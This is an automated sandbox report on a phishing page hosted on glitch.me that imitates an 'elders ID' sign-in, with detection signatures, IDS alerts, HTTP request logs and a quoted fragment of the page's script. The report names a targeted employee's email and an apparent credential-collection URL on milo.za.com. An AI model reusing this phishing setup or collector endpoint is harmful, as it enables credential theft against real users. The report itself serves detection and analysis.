Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://astonishing-maize-sunstone.glitch.me/

Overview

General Information

Sample URL:https://astonishing-maize-sunstone.glitch.me/
Analysis ID:1549841
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish10
Javascript uses Clearbit API to dynamically determine company logos
Detected hidden input values containing email addresses (often used in phishing pages)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML title does not match URL
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 1508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2164,i,9098095843155022011,1846821648532487114,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://astonishing-maize-sunstone.glitch.me/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-06T06:28:42.938552+010020294931A Network Trojan was detected192.168.2.4605991.1.1.153UDP
      2024-11-06T06:28:42.938844+010020294931A Network Trojan was detected192.168.2.4497831.1.1.153UDP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://astonishing-maize-sunstone.glitch.me/Avira URL Cloud: detection malicious, Label: phishing
      Source: https://astonishing-maize-sunstone.glitch.me/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

      Phishing

      barindex
      Source: Yara matchFile source: 1.0.pages.csv, type: HTML
      Source: Yara matchFile source: 1.1.pages.csv, type: HTML
      Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: const email = "matthew.harding@elders.com.au"; setcookie = (cname, cvalue, expdays) => { let date = new date(); date.settime(date.gettime() + (expdays * 24 * 60 * 60 * 1000)); const expires = "expires=" + date.toutcstring(); document.cookie = cname + "=" + cvalue + "; " + expires + "; path=/"; } getcookies = (cname) => { const name = cname + "="; const cdecoded = decodeuricomponent(document.cookie); const carr = cdecoded.split("; "); let value; carr.foreach(val => { if (val.indexof(name) === 0) { value = val.substring(name.length); } }); return value; } // set the cookie automatically when the page loads window.addeventlistener("load", () => { if (!getcookies("cookie")) { setcookie("cookie", true, 90); } ...
      Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: Matthew.Harding@elders.com.au
      Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: Number of links: 0
      Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: Total embedded image size: 1360528
      Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: Title: Sign in with elders ID does not match URL
      Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: <input type="password" .../> found
      Source: https://elders.com.au/HTTP Parser: No favicon
      Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: No <meta name="author".. found
      Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: No <meta name="author".. found
      Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: No <meta name="copyright".. found
      Source: https://astonishing-maize-sunstone.glitch.me/HTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:57675 version: TLS 1.2
      Source: chrome.exeMemory has grown: Private usage: 8MB later: 36MB
      Source: global trafficTCP traffic: 192.168.2.4:57670 -> 162.159.36.2:53
      Source: Network trafficSuricata IDS: 2029493 - Severity 1 - ET PHISHING Possible Glitch.me Phishing Domain : 192.168.2.4:49783 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2029493 - Severity 1 - ET PHISHING Possible Glitch.me Phishing Domain : 192.168.2.4:60599 -> 1.1.1.1:53
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: astonishing-maize-sunstone.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe_Acrobat_DC_logo_2020.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://astonishing-maize-sunstone.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /elders.com.au HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://astonishing-maize-sunstone.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe_Acrobat_DC_logo_2020.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /elders.com.au HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET //pood/phpp4all.php HTTP/1.1Host: milo.za.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET //pood/phpp4all.php HTTP/1.1Host: milo.za.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET //pood/phpp4all.php HTTP/1.1Host: milo.za.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://astonishing-maize-sunstone.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /.rum/@adobe/helix-rum-js@%5E2/dist/rum-standalone.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-head.lc-60038e123df28ea326da7b93dfc6bc75-lc.min.css HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.css HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.css HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /.rum/@adobe/helix-rum-js@%5E2/dist/rum-standalone.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /recaptcha/api.js?render=6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-base.lc-de3a13856264e0a5f9a3056f8dca43c3-lc.min.css HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/el-logo-2.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
